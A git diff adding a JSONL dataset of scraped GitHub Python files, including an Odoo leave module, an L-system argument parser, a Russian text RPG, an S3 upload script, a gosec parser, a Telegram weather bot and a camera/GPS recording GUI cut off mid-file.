diff --git "a/5195.jsonl" "b/5195.jsonl" new file mode 100644--- /dev/null +++ "b/5195.jsonl" @@ -0,0 +1,268 @@ +{"seq_id":"24826159474","text":"from odoo import api, fields, models, _\n\n\nclass PublicTimeOffRefuse(models.Model):\n _inherit = 'hr.leave'\n\n def refuse_public_holiday(self):\n type_off = self.env['hr.leave'].search([])\n for i in type_off:\n if i.holiday_status_id.name == 'Public Holiday':\n if i.state == 'validate':\n i.action_refuse()\n","repo_name":"muhammedmurshid/employee_addons","sub_path":"models/public_time_off_refuse.py","file_name":"public_time_off_refuse.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27735179337","text":"#import our own function\nfrom ls_user_input import getConfigFilename\n\ndef processCommandlineArguments(allArguments):\n \"\"\"\n function that processes commandline arguments\n\n Parameters\n ----------\n allArguments : list\n list of arguments\n\n Returns\n -------\n tuple\n configFilename, iterations, exportImageName, showDrawProcess, useProgressbar, closeAfterDrawing, useRandomConfig, useWebsite, exportSvg\n str int str bool bool bool bool bool bool\n name of config file name of export image use a progressbar use a random config also convert eps to svg\n amount of iterations show the draw process close after drawing use a website\n \"\"\" \n \n configFilename = iterations = exportImageName = useRandomConfig = useProgressbar = None\n showDrawProcess = closeAfterDrawing = useWebsite = exportSvg = False\n \n helpMessage = \"\"\"\n All commandline options:\n -h or --help Displays help.\n -c or --config Used to give the config file name to the program.\n -i or --iterations [amount] Used to give the amount of iterations to the program.\n -e or --export Exports the turtle drawing to an eps file.\n -s or --output_svg Convert the eps image from eps to svg.\n -sd or --show_draw_process Use this flag to see the turtle move.\n -up or --use_progress_bar Use this flag if you always want a progressbar.\n -np or --no_progress_bar Use this flag if you want no progressbar (e.g. 
for speed).\n -ca or --close_after_drawing Exit immediately after drawing.\n -rc or --random_config Generate a random l-System.\n -uw or --use_website Generate a website with the latest lSystem drawing.\n \"\"\"\n \n counter = 0\n while counter < len(allArguments)-1:\n counter += 1\n arg = allArguments[counter]\n \n if arg == \"--help\" or arg == \"-h\":\n print(helpMessage)\n exit(0)\n \n elif arg == \"--export\" or arg == \"-e\":\n counter += 1\n try: arg = allArguments[counter]\n except IndexError:\n exportImageName = \"\"\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n exportImageName = \"\"\n else:\n exportImageName = arg\n \n elif arg == \"--iterations\" or arg == \"-i\":\n counter += 1\n try: arg = allArguments[counter]\n except IndexError:\n print(\"Missing an argument.\")\n exit(0)\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n else:\n try: iterations = int(arg)\n except KeyError: \n print(\"--iterations must be followed by a positive integer.\")\n exit(0)\n \n elif arg == \"--config\" or arg == \"-c\":\n counter += 1\n try: arg = allArguments[counter]\n except IndexError:\n print(\"Missing an argument.\")\n exit(0)\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n else:\n configFilename = getConfigFilename(arg)\n \n elif arg == \"-rc\" or arg == \"--random_config\":\n useRandomConfig = \"Default\"\n counter += 1\n try: \n arg = allArguments[counter]\n except IndexError:\n useRandomConfig = \"Default\"\n if arg[0] == \"-\" or arg == \"\":\n counter -= 1\n else:\n useRandomConfig = arg\n \n elif arg == \"-sd\" or arg == \"--show_draw_process\":\n showDrawProcess = True\n \n elif arg == \"-up\" or arg == \"--use_progress_bar\":\n useProgressbar = True\n \n elif arg == \"-np\" or arg == \"--no_progress_bar\":\n useProgressbar = False\n \n elif arg == \"-ca\" or arg == \"--close_after_drawing\":\n closeAfterDrawing = True\n\n elif arg == \"-uw\" or arg == \"--use_webiste\":\n useWebsite = True\n\n elif arg == \"-s\" or arg == \"--output_svg\":\n exportSvg = True\n\n else:\n print(f\"Unknown argument: '{arg}' Use --help for help.\")\n exit(0)\n \n if useWebsite and exportImageName is None:\n exportImageName = \"\"\n \n if exportSvg:\n exportImageName = \"\"\n \n return configFilename, iterations, exportImageName, showDrawProcess, useProgressbar, closeAfterDrawing, useRandomConfig, useWebsite, exportSvg\n ","repo_name":"Quinten-Steeland-KuLeuven/l-systems","sub_path":"ls_commandline_arguments.py","file_name":"ls_commandline_arguments.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29679928288","text":"import random\n\nclass Base:\n def __init__(self, name, health, mana):\n self.atHP = health\n self.atMN = mana\n self.name = name\n self.str = \"X\"\n\n self.PosX = 0\n self.PosY = 0\n\n self.damage = 5\n self.enable = 1 #1 - включено, 0 - выколючено (мертво)\n\n #Делаем систему миссов\n self.miss = 0.1\n\n def hit(self, damage):\n if damage == 0:\n return\n\n #Система миссов (уклонения)\n if random.randint(0, 100) > self.miss * 100:\n self.atHP -= damage\n if self.atHP <= 0:\n self.enable = 0\n else:\n print(f'{self.name} получил урон {damage}, текущее здоровье {self.atHP}')\n else:\n print(f'{self.name} увернулся от атаки, текущее здоровье {self.atHP}')\n\n\n def setPos(self, X, Y):\n self.PosX = X\n self.PosY = Y\n\nclass BaseHero(Base):\n def __init__(self, name, health, mana):\n super().__init__(name, health, mana)\n self.miss = 0.3\n\n def 
drink_heal_potion(self, potion):\n self.atHP += potion\n print(f'{self.name} drink Health Potion')\n\n def drink_mana_potion(self, potion_mana):\n self.atMN += potion_mana\n print(f'{self.name} drink Mana Potion')\n\n def tryEat(self, Eat):\n if Eat is None :\n return\n\n if Eat.enable == 0:\n return\n\n if Eat.str == 'M':\n self.drink_mana_potion(20)\n if Eat.str == 'H':\n self.drink_heal_potion(20)\n\n\nclass Hero(BaseHero):\n def __init__(self, name, health, mana):\n super().__init__(name, health, mana)\n self.atSila = 10\n self.atInt = 5\n self.atLov = 5\n self.atExp = 0\n self.atLvl = 0\n\n self.type = 0\n self.atGuns = None\n self.items = []\n\n def status(self):\n print(f'Sila:{self.atSila}\\nInt:{self.atInt}\\nLov:{self.atLov}\\nExp:{self.atExp}\\nLvl:{self.atLvl}\\n')\n\n def scream(self):\n print(f'Я будущий герой {self.name}, но я не выбрал специальность.')\n cmd = input('1 - воин, 2 - маг, 3 - лучник, 4 - травник: ')\n if cmd == '1':\n self.type = 1\n elif cmd == '2':\n self.type = 2\n elif cmd == '3':\n self.type = 3\n elif cmd == '4':\n self.type = 4\n\n def attack(self, target, damage):\n if self.type == 0:\n print(f'Я будущий герой {self.name}, и я без оружия, но я нанес {target.name} урон {damage} своими руками')\n else:\n print(f'Я будущий герой {self.name}, c помощью {self.atGuns}, я нанес {target.name} урон {damage}')\n target.hit(damage)\n\n if target.atHP <= 0:\n print(f'{target.name} повержен, получено 10 очков опыта')\n self.AddExp(10)\n\n def AddExp(self, count):\n self.atExp += count\n if self.atExp == 100:\n self.atLvl += 1\n self.LVLUP()\n self.atExp -= 100\n\n def LvlUP(self):\n return\n\n\nclass Voin(Hero):\n def __init__(self, health, mana, name='Ричард'):\n super().__init__(name, health, mana)\n self.atGuns = 'Guns: Меч'\n self.damage = 20\n\n def status(self):\n self.scream()\n super().status()\n\n def LvlUP(self):\n self.atSila += 3\n self.atLov += 2\n self.atInt += 1\n\n def scream(self):\n print(f'Я герой {self.name} и я воин с {self.atGuns}')\n\n\nclass Mag(Hero):\n def __init__(self, health, mana, name='Ричард'):\n super().__init__(name, health, mana)\n self.atGuns = 'Guns: Посох'\n self.zaklinania = []\n\n def status(self):\n self.scream()\n super().status()\n\n def scream(self):\n print(f'Я маг герой {self.name} и я знаю {len(self.zaklinania)} заклинаний')\n\n def LvlUP(self):\n self.atSila += 1\n self.atLov += 2\n self.atInt += 4\n\n def add_magic(self, magic):\n self.zaklinania.append(magic)\n\nclass Archier(Hero):\n def __init__(self, health, mana, name='Ричард'):\n super().__init__(name, health, mana)\n self.atGuns = 'Guns: Лук'\n self.damage = 6\n\n def status(self):\n self.scream()\n super(Archier, self).status()\n\n def scream(self):\n print(f'Я герой {self.name} и я лучник с {self.atGuns}')\n\n\nclass NPC(BaseHero):\n def __init__(self, health, mana, lvl, name='Давид'):\n super().__init__(name, health, mana)\n self.atLVL = lvl\n\n def status(self):\n super().status()\n print(f'LVL: 1')\n\n def scream(self):\n print(f'Я {self.name} обычный NPC!')\n\n\nclass Travnik(NPC):\n def __init__(self, health, mana, lvl, name='Боб'):\n super().__init__(health, mana, lvl, name)\n self.damage = 0\n self.items = []\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный травник!” ')\n\n def job(self, target, heal_potion):\n #Некоректые задачи для job и make_potion\n return\n\n def make_potion(self, heal_potion, heal_power):\n heal_potion.power = heal_power\n 
self.items.append(heal_potion)\n\nclass Kuznic(NPC):\n def __init__(self, health, mana, lvl, name='Колька'):\n super().__init__(health, mana, lvl, name)\n self.damage = 4\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный кузнец!” ')\n\n def make_item(self, target, item):\n target.items.appened(item)\n\nclass Torgovec(NPC):\n def __init__(self, health, mana, lvl, name='Анакендий'):\n super().__init__(health, mana, lvl, name)\n self.damage = 4\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный торговец!” ')\n\n def make_item(self, target, item):\n target.items.appened(item)\n\nclass Volshebnik(NPC):\n def __init__(self, health, mana, lvl, name='Гоша'):\n super().__init__(health, mana, lvl, name)\n self.damage = 4\n\n def status(self):\n super().status()\n print(f'{self.atLVL}')\n\n def scream(self):\n print(f'Я {self.name} обычный странствующий волшебника!” ')\n\n def make_item(self, target, item):\n target.items.appened(item)\n\nclass Enemy(Base):\n def __init__(self, name, health, mana, lvl):\n super().__init__(name, health, mana)\n self.lvl = lvl\n self.items = [Item(5)]\n self.isBoss = 0\n\n def Attack(self, target):\n target.hit(self.damage);\n print(f'{self.name} аттаковал {target.name}, нанёс {self.damage}, осталось {target.atHP}')\n\nclass Zombie(Enemy):\n def __init__(self, name, health, mana, lvl):\n super().__init__(name, health, mana, lvl)\n self.lvl = lvl\n self.items = [Item(10)]\n\n def Attack(self, target):\n target.hit(target.atMN / 5)\n print(f'{self.name} аттаковал {target.name}, нанёс {self.damage}, осталось {target.atHP}')\n\nclass Item:\n def __init__(self, count, id=0, name='монета'):\n self.name = name\n self.count = count\n self.id = id\n\nclass Bess(Enemy):\n def __init__(self, name, health, mana, lvl):\n super().__init__(name, health, mana, lvl)\n self.damage = 20\n self.isBoss = 1\n self.items = [Item(100)]\n\n def Attack(self, target):\n target.hit(self.damage);\n print(f'{self.name} аттаковал {target.name}, нанёс {self.damage}, осталось {target.atHP}')\n if random.randint(0, 100) < 30:\n self.steal_mana(target)\n\n def steal_mana(self, target):\n target.atMN -= 5\n print(f'{self.name} съел ману у {target.name}, кол-во: {self.damage}, осталось: {target.atMN}')\n\nclass Gameplay:\n def EnemySpawn(self):\n\n count = random.Random.randint(random, 0, self.EnemyCount / 2)\n for i in range(count):\n enemy = Zombie('Зомби', 100, 50, 5)\n enemy.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n enemy.str = 'z'\n\n self.Enemy.append(enemy)\n\n for i in range(self.EnemyCount - count):\n enemy = Enemy('Пират', 100, 50, 5)\n enemy.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n enemy.str = 'O'\n\n self.Enemy.append(enemy)\n\n\n enemy = Bess(\"Босс\", 200, 100, 40)\n enemy.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n enemy.str = '#'\n\n self.Enemy.append(enemy)\n self.EnemyCount += 1\n\n def BuffsSpawn(self):\n ManaCount = random.Random.randint(random, 0, self.BuffsCount / 2)\n\n for i in range(ManaCount):\n buff = Base(1, 0, \"Health Buff\")\n buff.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n\n buff.damage = 0\n buff.str = 'H'\n\n self.Buffs.append(buff)\n\n for i in 
range(self.BuffsCount - ManaCount):\n buff = Base(1, 0, \"Mana Buff\")\n buff.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n\n buff.damage = 0\n buff.str = 'M'\n\n self.Buffs.append(buff)\n\n def NPCSpawn(self):\n travnik = Travnik(100, 50, random.randint(10, 50))\n travnik.str = '😤'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n travnik = Kuznic(100, 50, random.randint(10, 50))\n travnik.str = '🔨'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n travnik = Torgovec(100, 50, random.randint(10, 50))\n travnik.str = '👳'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n travnik = Volshebnik(100, 50, random.randint(10, 50))\n travnik.str = '⭐'\n travnik.setPos(\n random.Random.randint(random, 0, self.Width - 1),\n random.Random.randint(random, 0, self.Height - 1))\n self.NPC.append(travnik)\n\n def __init__(self):\n self.Enemy = []\n self.Buffs = []\n self.NPC = []\n\n self.BuffsCount = 10\n self.Width = 40\n self.Height = 10\n self.EnemyCount = 30\n\n self.BuffsSpawn()\n self.EnemySpawn()\n self.NPCSpawn()\n\n self.atStep = 1\n\n self.atKarta = [['_' for j in range(self.Width)] for i in range(self.Height)]\n\n self.hero = Hero('Ричард', 100, 50)\n self.hero.setPos(3, 3)\n self.atKarta[self.hero.PosY][self.hero.PosX] = self.hero.str\n for i in range(self.EnemyCount):\n self.atKarta[self.Enemy[i].PosY][self.Enemy[i].PosX] = \"O\"\n\n print('Игра началась')\n self.start()\n\n def start(self):\n self.hero.scream()\n\n hero = self.hero\n if self.hero.type == 1:\n hero = Voin(200, 50, hero.name)\n elif self.hero.type == 2:\n hero = Mag(200, 50, hero.name)\n elif self.hero.type == 3:\n hero = Archier(200, 50, hero.name)\n\n hero.setPos(self.hero.PosX, self.hero.PosY)\n hero.type = self.hero.type\n self.hero = hero\n\n self.interface()\n\n while True:\n #Проверка врагов\n Enemy = None\n\n for i in range(self.EnemyCount):\n if(self.Enemy[i].PosX == self.hero.PosX):\n if(self.Enemy[i].PosY == self.hero.PosY):\n if(self.Enemy[i].enable == 1):\n Enemy = self.Enemy[i]\n\n\n cmd = input('Action:')\n if cmd == '1':\n self.walk()\n elif cmd == '3':\n self.hero.status()\n continue\n elif cmd == '2':\n #Смотрим по бафам и ищем баф, с теми координатами, где стоит игрок\n Eat = None\n for i in range(self.BuffsCount):\n if (self.Buffs[i].PosX == self.hero.PosX):\n if (self.Buffs[i].PosY == self.hero.PosY):\n if(self.Buffs[i].enable == 1):\n Eat = self.Buffs[i]\n\n self.hero.tryEat(Eat)\n\n #Если тут был враг, то бьём игрока\n if Enemy != None:\n self.hero.hit(Enemy.damage)\n elif cmd == '4':\n if Enemy is not None:\n self.hero.attack(Enemy, self.hero.damage)\n\n if Enemy.enable == 1:\n self.hero.hit(Enemy.damage)\n if self.hero.atHP <= 0:\n print(f'Выс убили, и вы проиграли. 
Game over')\n return\n elif Enemy.isBoss == 1:\n print(f'Поздравляю вы прошли игру, игра закончена')\n return\n else:\n print(f'За убийтсво {Enemy.name} вы получили:')\n for i in range(len(Enemy.items)):\n print(f'{Enemy.items[i].name}: {Enemy.items[i].count}')\n\n elif cmd == 'break':\n print(f'Игра прервана')\n return\n else:\n print(\"Нет такой команды\")\n self.interface()\n self.atStep += 1\n\n def interface(self):\n for i in range(self.BuffsCount):\n if self.Buffs[i].enable == 1:\n self.atKarta[self.Buffs[i].PosY][self.Buffs[i].PosX] = self.Buffs[i].str\n\n for i in range(self.EnemyCount):\n if self.Enemy[i].enable == 1:\n self.atKarta[self.Enemy[i].PosY][self.Enemy[i].PosX] = self.Enemy[i].str\n\n for i in range(4):\n self.atKarta[self.NPC[i].PosY][self.NPC[i].PosX] = self.NPC[i].str\n\n self.atKarta[self.hero.PosY][self.hero.PosX] = 'X'\n\n print(f'Step:{self.atStep}')\n for s in self.atKarta: # Визуализация карты вместо print(*self.atKarta)\n print(*s)\n print(f'1 - walk, 2 - eat, ...')\n\n def walk(self):\n cmd = input('1 - left, 2 - right, 3 - up, 4 - down:')\n # горизонталь ось X\n self.atKarta[self.hero.PosY][self.hero.PosX] = '_'\n\n if cmd == '2':\n self.hero.PosX += 1\n if cmd == '1':\n self.hero.PosX -= 1\n # вертикаль ось Y\n if cmd == '3':\n self.hero.PosY -= 1\n if cmd == '4':\n self.hero.PosY += 1\n\n self.atKarta[self.hero.PosY][self.hero.PosX] = self.hero.str\n\nGameplay()","repo_name":"GeToNIX531/pyCharm1","sub_path":"lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":16048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12885042351","text":"\nfrom argparse import ArgumentParser\nimport boto3\nimport logging\nfrom multiprocessing.pool import ThreadPool\nimport math\n\nfrom ratelimit import Ratelimit\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass FRPCFormatter(logging.Formatter):\n \"\"\"FRPC colored logging formatter.\"\"\"\n\n BOLD_RED = \"\\033[1;31m\"\n BOLD_GREEN = \"\\033[1;32m\"\n BOLD_YELLOW = \"\\033[1;33m\"\n BOLD_CYAN = \"\\033[1;36m\"\n BOLD_WHITE = \"\\033[1;37m\"\n RESET = \"\\033[0m\"\n FORMAT = \"%(asctime)s: {}%(levelname)s{}: %(name)s: %(message)s\"\n\n COLORS = {\n logging.DEBUG: BOLD_WHITE,\n logging.INFO: BOLD_GREEN,\n logging.WARNING: BOLD_YELLOW,\n logging.ERROR: BOLD_RED,\n logging.CRITICAL: BOLD_CYAN,\n }\n\n def format(self, record):\n \"\"\"Format a logging record.\"\"\"\n try:\n escapes = (self.COLORS[record.levelno], self.RESET)\n except KeyError:\n escapes = (\"\",) * 2\n\n fmt = self.FORMAT.format(*escapes)\n\n return logging.Formatter(fmt).format(record)\n\n\nclass CriticalHandler(logging.Handler):\n \"\"\"Custom logging handler that calls `exit(1)` on critical log events.\"\"\"\n\n def createLock(self):\n \"\"\"Stub. 
No lock required for this handler.\"\"\"\n self.lock = None\n\n def emit(self, record):\n \"\"\"Crash the application on a critical event.\"\"\"\n if record.levelno == logging.CRITICAL:\n sys.exit(1)\n\n\ndef __setup_logging():\n stream_handler = logging.StreamHandler()\n\n stream_handler.setFormatter(FRPCFormatter())\n stream_handler.setLevel(logging.INFO)\n\n critical_handler = CriticalHandler()\n\n logging.basicConfig(level=logging.DEBUG, handlers=[\n stream_handler,\n critical_handler\n ])\n\n\ndef _run_init(ratelimit):\n global _ratelimit # pylint: disable=global-statement\n\n _ratelimit = ratelimit\n\n\ndef _run(entries):\n s3_client = boto3.client(\"s3\")\n\n for entry in entries:\n with _ratelimit:\n s3_client.upload_file(*entry)\n logger.info(f\"{entry} created\")\n\n\ndef main():\n __setup_logging()\n\n argparser = ArgumentParser(\n description=\"create CREQ files for a range of mac addresses\")\n\n argparser.add_argument(\"start\", type=lambda x: int(x, 16))\n argparser.add_argument(\"end\", type=lambda x: int(x, 16))\n argparser.add_argument(\"--threads\", type=int, default=48)\n\n args = argparser.parse_args()\n ratelimit = Ratelimit(0.01)\n s3_client = boto3.client(\"s3\")\n\n with ThreadPool(processes=args.threads, initializer=_run_init,\n initargs=(ratelimit,)) as pool:\n put_args = [\n (\"creqfile\", \"siq-dev-boson-devices\", f\"creq/{i:x}\")\n for i in range(args.start, args.end + 1)\n ]\n\n batch_size = math.ceil(len(put_args) / args.threads)\n partitions = [\n put_args[i: i + batch_size]\n for i in range(0, len(put_args), batch_size)\n ]\n\n for _ in pool.imap_unordered(_run, partitions):\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Sord27/ttt","sub_path":"device/python/LIT-3967/create_creq_files.py","file_name":"create_creq_files.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4112430492","text":"import json\n\nfrom collections import OrderedDict\n\nfrom dusty.tools import markdown\n\n\nclass GosecOutputParser:\n \"\"\" Parses gosec output and populates finding list \"\"\"\n\n def __init__(self, output):\n self.items = list()\n # Parse JSON from gosec stdout\n data = json.loads(output)\n # Populate findings\n all_items = OrderedDict()\n for item in data[\"Issues\"]:\n # Prepare finding item\n title = f\"{item['details']} - in {item['file']}\"\n if title not in all_items:\n tool = \"gosec\"\n severity = item[\"severity\"]\n file_path = item[\"file\"]\n description = \\\n f\"{markdown.markdown_escape(item['details'])}\\n\\n\" \\\n f\"**Rule ID**: {markdown.markdown_escape(item['rule_id'])}\\n\\n\" \\\n f\"**Confidence**: {markdown.markdown_escape(item['confidence'])}\"\n steps_to_reproduce = list()\n all_items[title] = {\n \"title\": title,\n \"severity\": severity,\n \"file_path\": file_path,\n \"description\": description,\n \"steps_to_reproduce\": steps_to_reproduce\n }\n # Fill steps to reproduce\n finding = all_items[title]\n finding['steps_to_reproduce'].append(\n f\"
\" \\\n                f\"Location: {item['file']}:{item['line']}\\n\" \\\n                f\"Code:\\n{item['code']}\" \\\n                f\"
\"\n )\n # Populate items\n for key in all_items:\n self.items.append(all_items[key])\n","repo_name":"carrier-io/dusty","sub_path":"dusty/scanners/sast/gosec/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71383614916","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.random = None\n\n\nclass LinkedList:\n def __init__(self, node):\n self.head = node\n\n # Method to print the list.\n def __repr__(self):\n temp = self.head\n while temp is not None:\n random = temp.random\n random_data = (random.data if\n random is not None else -1)\n\n data = temp.data\n print(\n f\"Data-{data}, Random data: {random_data}\")\n temp = temp.next\n\n return \"\\n\"\n\n def push(self, data):\n node = Node(data)\n node.next = self.head\n self.head = node\n\n\nl = LinkedList(Node(5))\nl.push(4)\nl.push(3)\nl.push(2)\nl.push(1)\n\n# Setting up random references.\nl.head.random = l.head.next.next\nl.head.next.random = l.head.next.next.next\nl.head.next.next.random = l.head.next.next.next.next\nl.head.next.next.next.random = (l.head.next.next.next.next.next)\nl.head.next.next.next.next.random = l.head.next\n# print(l)\ndef clone(origional_list):\n #clone the simple part of list\n temp=origional_list.head\n clone_list=LinkedList(Node(temp.data))\n clone_temp=clone_list.head\n temp=temp.next\n while temp:\n clone_temp.next=Node(temp.data)\n clone_temp=clone_temp.next\n temp=temp.next\n # print(clone_list)\n\n #connect lists\n o=origional_list.head\n ogtemp=o\n o=o.next\n\n c = clone_list.head\n cltemp=c\n c=c.next\n\n while o:\n ogtemp.next=cltemp\n cltemp.next=o\n\n ogtemp = o\n o = o.next\n cltemp = c\n c = c.next\n ogtemp.next = cltemp\n\n print(origional_list)\n\n # connect Rnadom pointers\n oghead=origional_list.head\n ogtemp = oghead\n\n clhead=oghead.next\n cltemp=clhead\n\n while ogtemp:\n if ogtemp.random:\n cltemp.random =ogtemp.random.next\n ogtemp=ogtemp.next.next\n if ogtemp:\n cltemp=cltemp.next.next\n # print(origional_list)\n\n\n #remove old links\n oghead=origional_list.head\n ogtemp = oghead\n\n clhead=oghead.next\n cltemp=clhead\n\n while ogtemp:\n ogtemp.next=ogtemp.next.next\n ogtemp=ogtemp.next\n if ogtemp:\n cltemp.next=cltemp.next.next\n cltemp=cltemp.next\n\n # check\n origional_list=LinkedList(oghead)\n clone_list=LinkedList(clhead)\n print(origional_list)\n print(clone_list)\n\nclone(l)\n\n","repo_name":"ankitjindal7240/DSA_450","sub_path":"LinkedList/clone_with_random.py","file_name":"clone_with_random.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70164384834","text":"import os\nimport requests\n\n# Setup API keys as environment variables\nTELEGRAM_BOT_API_KEY = os.environ.get(\"TELEGRAM_BOT_API_KEY\")\nOPEN_WEATHER_API_KEY = os.environ.get(\"OPEN_WEATHER_API_KEY\")\nMY_LATITUDE = 55.953251\nMY_LONGITUDE = -3.188267\n\n# Call Telegram API to fetch user chat ID\ntelegram_response = requests.get(f\"https://api.telegram.org/bot{TELEGRAM_BOT_API_KEY}/getUpdates\")\ntelegram_response.raise_for_status()\ntelegram_data = telegram_response.json()\ntelegram_chat_id = telegram_data[\"result\"][0][\"message\"][\"chat\"][\"id\"]\n\n# Setup location parameters and API key for OpenWeather API\nweather_parameters = {\n \"lat\": MY_LATITUDE,\n \"lon\": MY_LONGITUDE,\n \"appid\": OPEN_WEATHER_API_KEY,\n \"cnt\": 
4\n}\n\nresponse = requests.get(\"https://api.openweathermap.org/data/2.5/forecast\", params=weather_parameters)\nresponse.raise_for_status()\nweather_data = response.json()\n\nwill_rain = False\nfor hour_data in weather_data[\"list\"]:\n condition_code = hour_data[\"weather\"][0][\"id\"]\n if int(condition_code) < 700:\n will_rain = True\n\nif will_rain:\n telegram_parameters = {\n \"chat_id\": telegram_chat_id,\n \"text\": \"Weather forecast for the day is rainy. Bring an Umbrella!\"\n }\n\n response = requests.get(\n f\"https://api.telegram.org/bot{TELEGRAM_BOT_API_KEY}/sendMessage\",\n params=telegram_parameters\n )\n response.raise_for_status()\n","repo_name":"RobertoLJr/100-days-of-python","sub_path":"day-035-project-rain-alert-telegram-notification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23714124300","text":"import tkinter\nimport time\nimport timeit\nimport datetime\nimport threading\nimport multiprocessing\nimport random\nfrom queue import Queue\nimport os\nimport sys\nimport numpy\nfrom GpsCapture import GpsCapture\nfrom See3Cam import See3Cam\nfrom FPS import FPS\nfrom RecordingThreadController import RecordingThreadController\nimport cv2\nfrom GuiPart import GuiPart\nimport serial\nimport serial.tools.list_ports\nimport PIL.Image, PIL.ImageTk\nimport PIL \nfrom PIL import Image\nfrom PIL import ImageTk\nimport subprocess\nfrom subprocess import PIPE\n\n# Importing the libraries for the object detection\nimport torch\nfrom torch.autograd import Variable\nimport cv2\nfrom data import BaseTransform, VOC_CLASSES as labelmap\nfrom ssd import build_ssd\nimport imageio\nimport timeit\nimport time\nfrom statistics import mean\nfrom jproperties import Properties\n\ncuda=torch.cuda.device(0)\nif torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\nelse:\n torch.set_default_tensor_type('torch.FloatTensor')\n\n# Creating the SSD neural network\nnet = build_ssd('test') # We create an object that is our neural network ssd.\nnet.load_state_dict(torch.load('ssd300_mAP_77.43_v2.pth', map_location = lambda storage, loc: storage)) # We get the weights of the neural network from another one that is pretrained (ssd300_mAP_77.43_v2.pth).\n\n# Creating the transformation\ntransform = BaseTransform(net.size, (104/256.0, 117/256.0, 123/256.0)) # We create an object of the BaseTransform class, a class that will do the required transformations so that the image can be the input of the neural network.\n\n\n\nclass ThreadedClient:\n \"\"\"\n Launch the main part of the GUI and the differents threads of the Tool.\n One class responsible of the different control threads \n \"\"\"\n\n def __init__(self, master):\n\n\n \"\"\"\n Start the GUI and the asynchronous threads. 
We are in the main\n (original) thread of the application, which will later be used by\n the GUI as well.\n \"\"\"\n self.master = master\n self.gps_destination_file_name = \"\"\n self.frames_destination_timestamp =\"\"\n self.video_destination_file_handler = cv2.VideoWriter()\n self.gps_destination_dir = \"/home/knorr-bremse/Projects/Digits4RailMaps/icom_track_gui/GPS/\"\n self.video_destination_dir = \"/home/knorr-bremse/Projects/Digits4RailMaps/icom_track_gui/Videos/\"\n self.record= False\n self.img = None\n self.frame = None\n self.frame1 = None\n self.f = 0\n self.check = False\n self.brahim = 1.0/25\n\n # p = Properties()\n # with open('config.properties', 'rb') as f:\n # p.load(f, 'utf-8')\n\n # print(p[\"video_id\"].data) #### incremtentaiton properties file \n # p[\"video_id\"]=str(int(p[\"video_id\"].data) +1)\n # print(p[\"video_id\"].data)\n # with open('config.properties', 'wb') as f:\n # p.store(f, encoding=\"utf-8\")\n\n self.frame = None\n # Create the gps queue\n self.gps_queue = Queue()\n # principal thread\n self.running = 1\n self.cameras_state = self.find_cam()\n print(self.cameras_state)\n if self.cameras_state[0]:\n self.camera = See3Cam(src=self.cameras_state[1], width=1280, height=720, framerate=30, name=\"CAM\")\n self.camera.start()\n if self.cameras_state[2]:\n self.camera1 = See3Cam(src=self.cameras_state[3], width=1280, height=720, framerate=30, name=\"CAM1\")\n self.camera1.start()\n\n self.fps = FPS()\n \n # Set up Gps\n self.gps = GpsCapture()\n # Set up the GUI part\n self.gui = GuiPart(master, self, self.cameras_state, self.gps.running, self.recordData, self.stopRecord)\n \n\n \n # Set up the thread for the GPS checking\n gps_controller = threading.Thread(target=self.checkGpsConnection, args=(2,))\n gps_controller.setDaemon(True)\n gps_controller.start()\n\n # Set up the thread for the camera checking\n camera_controller = threading.Thread(target=self.checkCameraConnection, args=(2,))\n camera_controller.setDaemon(True)\n camera_controller.start()\n\n # # Set up the thread for the video stream\n # camera_controller = threading.Thread(target=self.readCameraThread, args=(self.brahim,))\n # camera_controller.setDaemon(True)\n # camera_controller.start()\n\n # Set up the thread for the GPS stream\n camera_controller = threading.Thread(target=self.readGpsThread, args=(self.brahim,)) ## refactoring\n camera_controller.setDaemon(True)\n camera_controller.start()\n\n # Set up the Thread for the data recording\n self.recordingThread = RecordingThreadController(self, self.video_destination_dir, 